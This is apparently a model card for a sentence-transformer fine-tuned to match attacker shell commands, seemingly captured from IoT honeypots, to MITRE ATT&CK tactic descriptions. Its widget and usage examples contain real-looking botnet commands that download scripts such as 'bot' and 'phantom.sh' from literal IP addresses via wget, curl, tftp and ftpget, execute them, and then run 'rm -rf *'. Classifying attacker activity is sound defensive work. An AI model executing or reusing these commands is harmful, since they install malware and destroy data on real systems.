cebollet's picture
Add new SentenceTransformer model
59fa5ae verified
metadata
tags:
  - sentence-transformers
  - sentence-similarity
  - feature-extraction
  - generated_from_trainer
  - dataset_size:212
  - loss:CosineSimilarityLoss
base_model: sentence-transformers/all-mpnet-base-v2
widget:
  - source_sentence: sh; enable; system; shell; /bin/busybox
    sentences:
      - >-
        Defense Evasion: The adversary is trying to avoid being detected.


        Defense Evasion consists of techniques that adversaries use to avoid
        detection throughout their compromise. Techniques used for defense
        evasion include uninstalling/disabling security software or
        obfuscating/encrypting data and scripts. Adversaries also leverage and
        abuse trusted processes to hide and masquerade their malware. Other
        tactics’ techniques are cross-listed here when those techniques include
        the added benefit of subverting defenses. 
      - >-
        Defense Evasion: The adversary is trying to avoid being detected.


        Defense Evasion consists of techniques that adversaries use to avoid
        detection throughout their compromise. Techniques used for defense
        evasion include uninstalling/disabling security software or
        obfuscating/encrypting data and scripts. Adversaries also leverage and
        abuse trusted processes to hide and masquerade their malware. Other
        tactics’ techniques are cross-listed here when those techniques include
        the added benefit of subverting defenses. 
      - >-
        Lateral Movement: The adversary is trying to move through your
        environment.


        Lateral Movement consists of techniques that adversaries use to enter
        and control remote systems on a network. Following through on their
        primary objective often requires exploring the network to find their
        target and subsequently gaining access to it. Reaching their objective
        often involves pivoting through multiple systems and accounts to gain.
        Adversaries might install their own remote access tools to accomplish
        Lateral Movement or use legitimate credentials with native network and
        operating system tools, which may be stealthier. 
  - source_sentence: enable; ; system; ; shell; ; SH; ; /bin/busybox
    sentences:
      - >-
        Persistence: The adversary is trying to maintain their foothold.


        Persistence consists of techniques that adversaries use to keep access
        to systems across restarts, changed credentials, and other interruptions
        that could cut off their access. Techniques used for persistence include
        any access, action, or configuration changes that let them maintain
        their foothold on systems, such as replacing or hijacking legitimate
        code or adding startup code. 
      - >-
        Privilege Escalation: The adversary is trying to gain higher-level
        permissions.


        Privilege Escalation consists of techniques that adversaries use to gain
        higher-level permissions on a system or network. Adversaries can often
        enter and explore a network with unprivileged access but require
        elevated permissions to follow through on their objectives. Common
        approaches are to take advantage of system weaknesses,
        misconfigurations, and vulnerabilities. Examples of elevated access
        include: 


        * SYSTEM/root level

        * local administrator

        * user account with admin-like access 

        * user accounts with access to specific system or perform specific
        function


        These techniques often overlap with Persistence techniques, as OS
        features that let an adversary persist can execute in an elevated
        context.  
      - >-
        Defense Evasion: The adversary is trying to avoid being detected.


        Defense Evasion consists of techniques that adversaries use to avoid
        detection throughout their compromise. Techniques used for defense
        evasion include uninstalling/disabling security software or
        obfuscating/encrypting data and scripts. Adversaries also leverage and
        abuse trusted processes to hide and masquerade their malware. Other
        tactics’ techniques are cross-listed here when those techniques include
        the added benefit of subverting defenses. 
  - source_sentence: zlxx; enable; ; system; ; shell; ; sh; ; /bin/busybox
    sentences:
      - >-
        Defense Evasion: The adversary is trying to avoid being detected.


        Defense Evasion consists of techniques that adversaries use to avoid
        detection throughout their compromise. Techniques used for defense
        evasion include uninstalling/disabling security software or
        obfuscating/encrypting data and scripts. Adversaries also leverage and
        abuse trusted processes to hide and masquerade their malware. Other
        tactics’ techniques are cross-listed here when those techniques include
        the added benefit of subverting defenses. 
      - >-
        Execution: The adversary is trying to run malicious code.


        Execution consists of techniques that result in adversary-controlled
        code running on a local or remote system. Techniques that run malicious
        code are often paired with techniques from all other tactics to achieve
        broader goals, like exploring a network or stealing data. For example,
        an adversary might use a remote access tool to run a PowerShell script
        that does Remote System Discovery. 
      - >-
        Persistence: The adversary is trying to maintain their foothold.


        Persistence consists of techniques that adversaries use to keep access
        to systems across restarts, changed credentials, and other interruptions
        that could cut off their access. Techniques used for persistence include
        any access, action, or configuration changes that let them maintain
        their foothold on systems, such as replacing or hijacking legitimate
        code or adding startup code. 
  - source_sentence: >-
      cd /tmp; cd /var/run; cd /mnt; cd /root; cd /; wget
      http://89.110.99.68/bot; chmod 777 *; ./bot; cd /tmp; cd /var/run; cd
      /mnt; cd /root; cd /; wget http://89.110.99.68/bot; chmod 777 *; ./bot
    sentences:
      - >-
        Resource Development: The adversary is trying to establish resources
        they can use to support operations.


        Resource Development consists of techniques that involve adversaries
        creating, purchasing, or compromising/stealing resources that can be
        used to support targeting. Such resources include infrastructure,
        accounts, or capabilities. These resources can be leveraged by the
        adversary to aid in other phases of the adversary lifecycle, such as
        using purchased domains to support Command and Control, email accounts
        for phishing as a part of Initial Access, or stealing code signing
        certificates to help with Defense Evasion.
      - >-
        Privilege Escalation: The adversary is trying to gain higher-level
        permissions.


        Privilege Escalation consists of techniques that adversaries use to gain
        higher-level permissions on a system or network. Adversaries can often
        enter and explore a network with unprivileged access but require
        elevated permissions to follow through on their objectives. Common
        approaches are to take advantage of system weaknesses,
        misconfigurations, and vulnerabilities. Examples of elevated access
        include: 


        * SYSTEM/root level

        * local administrator

        * user account with admin-like access 

        * user accounts with access to specific system or perform specific
        function


        These techniques often overlap with Persistence techniques, as OS
        features that let an adversary persist can execute in an elevated
        context.  
      - >-
        Execution: The adversary is trying to run malicious code.


        Execution consists of techniques that result in adversary-controlled
        code running on a local or remote system. Techniques that run malicious
        code are often paired with techniques from all other tactics to achieve
        broader goals, like exploring a network or stealing data. For example,
        an adversary might use a remote access tool to run a PowerShell script
        that does Remote System Discovery. 
  - source_sentence: >-
      cd /tmp; cd /var/run; cd /mnt; cd /root; cd /; wget
      http://74.48.108.226/phantom.sh; chmod 777 phantom.sh; sh phantom.sh;
      chmod 777 phantom.sh; sh phantom.sh; chmod 777 phantom2.sh; sh
      phantom2.sh; sh phantom1.sh; rm -rf phantom.sh phantom.sh phantom2.sh
      phantom1.sh; rm -rf *; curl -O http://74.48.108.226/phantom.sh; tftp
      74.48.108.226 -c get phantom.sh; tftp -r phantom2.sh -g 74.48.108.226;
      ftpget -v -u anonymous -p anonymous -P 21 74.48.108.226 phantom1.sh
      phantom1.sh
    sentences:
      - >-
        Reconnaissance: The adversary is trying to gather information they can
        use to plan future operations.


        Reconnaissance consists of techniques that involve adversaries actively
        or passively gathering information that can be used to support
        targeting. Such information may include details of the victim
        organization, infrastructure, or staff/personnel. This information can
        be leveraged by the adversary to aid in other phases of the adversary
        lifecycle, such as using gathered information to plan and execute
        Initial Access, to scope and prioritize post-compromise objectives, or
        to drive and lead further Reconnaissance efforts.
      - >-
        Reconnaissance: The adversary is trying to gather information they can
        use to plan future operations.


        Reconnaissance consists of techniques that involve adversaries actively
        or passively gathering information that can be used to support
        targeting. Such information may include details of the victim
        organization, infrastructure, or staff/personnel. This information can
        be leveraged by the adversary to aid in other phases of the adversary
        lifecycle, such as using gathered information to plan and execute
        Initial Access, to scope and prioritize post-compromise objectives, or
        to drive and lead further Reconnaissance efforts.
      - >-
        Privilege Escalation: The adversary is trying to gain higher-level
        permissions.


        Privilege Escalation consists of techniques that adversaries use to gain
        higher-level permissions on a system or network. Adversaries can often
        enter and explore a network with unprivileged access but require
        elevated permissions to follow through on their objectives. Common
        approaches are to take advantage of system weaknesses,
        misconfigurations, and vulnerabilities. Examples of elevated access
        include: 


        * SYSTEM/root level

        * local administrator

        * user account with admin-like access 

        * user accounts with access to specific system or perform specific
        function


        These techniques often overlap with Persistence techniques, as OS
        features that let an adversary persist can execute in an elevated
        context.  
pipeline_tag: sentence-similarity
library_name: sentence-transformers

SentenceTransformer based on sentence-transformers/all-mpnet-base-v2

This is a sentence-transformers model finetuned from sentence-transformers/all-mpnet-base-v2. It maps sentences & paragraphs to a 768-dimensional dense vector space and can be used for semantic textual similarity, semantic search, paraphrase mining, text classification, clustering, and more.

Model Details

Model Description

  • Model Type: Sentence Transformer
  • Base model: sentence-transformers/all-mpnet-base-v2
  • Maximum Sequence Length: 384 tokens
  • Output Dimensionality: 768 dimensions
  • Similarity Function: Cosine Similarity

Model Sources

Full Model Architecture

SentenceTransformer(
  (0): Transformer({'max_seq_length': 384, 'do_lower_case': False}) with Transformer model: MPNetModel 
  (1): Pooling({'word_embedding_dimension': 768, 'pooling_mode_cls_token': False, 'pooling_mode_mean_tokens': True, 'pooling_mode_max_tokens': False, 'pooling_mode_mean_sqrt_len_tokens': False, 'pooling_mode_weightedmean_tokens': False, 'pooling_mode_lasttoken': False, 'include_prompt': True})
  (2): Normalize()
)

Usage

Direct Usage (Sentence Transformers)

First install the Sentence Transformers library:

pip install -U sentence-transformers

Then you can load this model and run inference.

from sentence_transformers import SentenceTransformer

# Download from the 🤗 Hub
model = SentenceTransformer("cebollet/fine-tuned-mitre-model")
# Run inference
sentences = [
    'cd /tmp; cd /var/run; cd /mnt; cd /root; cd /; wget http://74.48.108.226/phantom.sh; chmod 777 phantom.sh; sh phantom.sh; chmod 777 phantom.sh; sh phantom.sh; chmod 777 phantom2.sh; sh phantom2.sh; sh phantom1.sh; rm -rf phantom.sh phantom.sh phantom2.sh phantom1.sh; rm -rf *; curl -O http://74.48.108.226/phantom.sh; tftp 74.48.108.226 -c get phantom.sh; tftp -r phantom2.sh -g 74.48.108.226; ftpget -v -u anonymous -p anonymous -P 21 74.48.108.226 phantom1.sh phantom1.sh',
    'Reconnaissance: The adversary is trying to gather information they can use to plan future operations.\n\nReconnaissance consists of techniques that involve adversaries actively or passively gathering information that can be used to support targeting. Such information may include details of the victim organization, infrastructure, or staff/personnel. This information can be leveraged by the adversary to aid in other phases of the adversary lifecycle, such as using gathered information to plan and execute Initial Access, to scope and prioritize post-compromise objectives, or to drive and lead further Reconnaissance efforts.',
    'Privilege Escalation: The adversary is trying to gain higher-level permissions.\n\nPrivilege Escalation consists of techniques that adversaries use to gain higher-level permissions on a system or network. Adversaries can often enter and explore a network with unprivileged access but require elevated permissions to follow through on their objectives. Common approaches are to take advantage of system weaknesses, misconfigurations, and vulnerabilities. Examples of elevated access include: \n\n* SYSTEM/root level\n* local administrator\n* user account with admin-like access \n* user accounts with access to specific system or perform specific function\n\nThese techniques often overlap with Persistence techniques, as OS features that let an adversary persist can execute in an elevated context.  ',
]
embeddings = model.encode(sentences)
print(embeddings.shape)
# [3, 768]

# Get the similarity scores for the embeddings
similarities = model.similarity(embeddings, embeddings)
print(similarities.shape)
# [3, 3]

Training Details

Training Dataset

Unnamed Dataset

  • Size: 212 training samples
  • Columns: sentence_0, sentence_1, and label
  • Approximate statistics based on the first 212 samples:
    sentence_0 sentence_1 label
    type string string float
    details
    • min: 4 tokens
    • mean: 65.7 tokens
    • max: 384 tokens
    • min: 82 tokens
    • mean: 103.74 tokens
    • max: 153 tokens
    • min: 0.0
    • mean: 0.5
    • max: 1.0
  • Samples:
    sentence_0 sentence_1 label
    sh; enable; klv1234; system; shell; echo "string" Initial Access: The adversary is trying to get into your network.

    Initial Access consists of techniques that use various entry vectors to gain their initial foothold within a network. Techniques used to gain a foothold include targeted spearphishing and exploiting weaknesses on public-facing web servers. Footholds gained through initial access may allow for continued access, like valid accounts and use of external remote services, or may be limited-use due to changing passwords.
    0.0
    sh; ping; sh; enable; system; shell; linuxshell; /bin/busybox Lateral Movement: The adversary is trying to move through your environment.

    Lateral Movement consists of techniques that adversaries use to enter and control remote systems on a network. Following through on their primary objective often requires exploring the network to find their target and subsequently gaining access to it. Reaching their objective often involves pivoting through multiple systems and accounts to gain. Adversaries might install their own remote access tools to accomplish Lateral Movement or use legitimate credentials with native network and operating system tools, which may be stealthier.
    0.0
    enable; ; linuxshell; ; system; ; sh; ; /bin/busybox Privilege Escalation: The adversary is trying to gain higher-level permissions.

    Privilege Escalation consists of techniques that adversaries use to gain higher-level permissions on a system or network. Adversaries can often enter and explore a network with unprivileged access but require elevated permissions to follow through on their objectives. Common approaches are to take advantage of system weaknesses, misconfigurations, and vulnerabilities. Examples of elevated access include:

    * SYSTEM/root level
    * local administrator
    * user account with admin-like access
    * user accounts with access to specific system or perform specific function

    These techniques often overlap with Persistence techniques, as OS features that let an adversary persist can execute in an elevated context.
    1.0
  • Loss: CosineSimilarityLoss with these parameters:
    {
        "loss_fct": "torch.nn.modules.loss.MSELoss"
    }
    

Training Hyperparameters

Non-Default Hyperparameters

  • per_device_train_batch_size: 4
  • per_device_eval_batch_size: 4
  • num_train_epochs: 10
  • multi_dataset_batch_sampler: round_robin

All Hyperparameters

Click to expand
  • overwrite_output_dir: False
  • do_predict: False
  • eval_strategy: no
  • prediction_loss_only: True
  • per_device_train_batch_size: 4
  • per_device_eval_batch_size: 4
  • per_gpu_train_batch_size: None
  • per_gpu_eval_batch_size: None
  • gradient_accumulation_steps: 1
  • eval_accumulation_steps: None
  • torch_empty_cache_steps: None
  • learning_rate: 5e-05
  • weight_decay: 0.0
  • adam_beta1: 0.9
  • adam_beta2: 0.999
  • adam_epsilon: 1e-08
  • max_grad_norm: 1
  • num_train_epochs: 10
  • max_steps: -1
  • lr_scheduler_type: linear
  • lr_scheduler_kwargs: {}
  • warmup_ratio: 0.0
  • warmup_steps: 0
  • log_level: passive
  • log_level_replica: warning
  • log_on_each_node: True
  • logging_nan_inf_filter: True
  • save_safetensors: True
  • save_on_each_node: False
  • save_only_model: False
  • restore_callback_states_from_checkpoint: False
  • no_cuda: False
  • use_cpu: False
  • use_mps_device: False
  • seed: 42
  • data_seed: None
  • jit_mode_eval: False
  • use_ipex: False
  • bf16: False
  • fp16: False
  • fp16_opt_level: O1
  • half_precision_backend: auto
  • bf16_full_eval: False
  • fp16_full_eval: False
  • tf32: None
  • local_rank: 0
  • ddp_backend: None
  • tpu_num_cores: None
  • tpu_metrics_debug: False
  • debug: []
  • dataloader_drop_last: False
  • dataloader_num_workers: 0
  • dataloader_prefetch_factor: None
  • past_index: -1
  • disable_tqdm: False
  • remove_unused_columns: True
  • label_names: None
  • load_best_model_at_end: False
  • ignore_data_skip: False
  • fsdp: []
  • fsdp_min_num_params: 0
  • fsdp_config: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False}
  • fsdp_transformer_layer_cls_to_wrap: None
  • accelerator_config: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None}
  • deepspeed: None
  • label_smoothing_factor: 0.0
  • optim: adamw_torch
  • optim_args: None
  • adafactor: False
  • group_by_length: False
  • length_column_name: length
  • ddp_find_unused_parameters: None
  • ddp_bucket_cap_mb: None
  • ddp_broadcast_buffers: False
  • dataloader_pin_memory: True
  • dataloader_persistent_workers: False
  • skip_memory_metrics: True
  • use_legacy_prediction_loop: False
  • push_to_hub: False
  • resume_from_checkpoint: None
  • hub_model_id: None
  • hub_strategy: every_save
  • hub_private_repo: None
  • hub_always_push: False
  • gradient_checkpointing: False
  • gradient_checkpointing_kwargs: None
  • include_inputs_for_metrics: False
  • include_for_metrics: []
  • eval_do_concat_batches: True
  • fp16_backend: auto
  • push_to_hub_model_id: None
  • push_to_hub_organization: None
  • mp_parameters:
  • auto_find_batch_size: False
  • full_determinism: False
  • torchdynamo: None
  • ray_scope: last
  • ddp_timeout: 1800
  • torch_compile: False
  • torch_compile_backend: None
  • torch_compile_mode: None
  • include_tokens_per_second: False
  • include_num_input_tokens_seen: False
  • neftune_noise_alpha: None
  • optim_target_modules: None
  • batch_eval_metrics: False
  • eval_on_start: False
  • use_liger_kernel: False
  • eval_use_gather_object: False
  • average_tokens_across_devices: False
  • prompts: None
  • batch_sampler: batch_sampler
  • multi_dataset_batch_sampler: round_robin

Training Logs

Epoch Step Training Loss
9.4340 500 0.0526

Framework Versions

  • Python: 3.11.13
  • Sentence Transformers: 4.1.0
  • Transformers: 4.52.4
  • PyTorch: 2.6.0+cu124
  • Accelerate: 1.7.0
  • Datasets: 2.14.4
  • Tokenizers: 0.21.1

Citation

BibTeX

Sentence Transformers

@inproceedings{reimers-2019-sentence-bert,
    title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks",
    author = "Reimers, Nils and Gurevych, Iryna",
    booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing",
    month = "11",
    year = "2019",
    publisher = "Association for Computational Linguistics",
    url = "https://arxiv.org/abs/1908.10084",
}